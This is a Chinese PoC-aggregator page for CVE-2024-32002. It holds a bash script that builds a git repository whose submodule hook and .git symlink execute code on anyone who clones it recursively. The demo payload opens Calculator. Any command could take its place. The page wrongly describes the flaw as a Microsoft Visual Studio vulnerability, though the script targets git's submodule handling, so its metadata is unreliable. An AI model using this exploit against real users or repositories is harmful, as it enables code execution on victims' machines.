POC详情: 97020a90a7abc6ad360d6bb7bcf4aa3384fcd06f

来源
https://github.com/bfengj/CVE-2024-32002-Exploit
关联漏洞
标题: Microsoft Visual Studio 安全漏洞 (CVE-2024-32002)
描述:Microsoft Visual Studio是美国微软(Microsoft)公司的一款开发工具套件系列产品,也是一个基本完整的开发工具集,它包括了整个软件生命周期中所需要的大部分工具。 Microsoft Visual Studio存在安全漏洞的相关信息,请随时关注CNNVD或厂商公告。
介绍




```bash
#!/bin/bash

git init hook
cd hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
open -a Calculator.app
EOF


chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"
git remote add origin git@github.com:bfengj/CVE-2024-32002-hook.git
git push -u origin main

cd ..


git init exploit
cd exploit
git submodule add --name x/y git@github.com:bfengj/CVE-2024-32002-hook.git A/modules/x
git commit -m "add-submodule"

# 创建符号链接
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git remote add origin git@github.com:bfengj/CVE-2024-32002-Exploit.git
git push -u origin main
cd ..

#测试
git clone --recursive git@github.com:bfengj/CVE-2024-32002-Exploit.git exploited
```
文件快照

 [4.0K]  /data/pocs/97020a90a7abc6ad360d6bb7bcf4aa3384fcd06f
├── [   4]  a -> .git
├── [4.0K]  A
│   └── [4.0K]  modules
│       └── [4.0K]  x
└── [ 909]  README.md

4 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。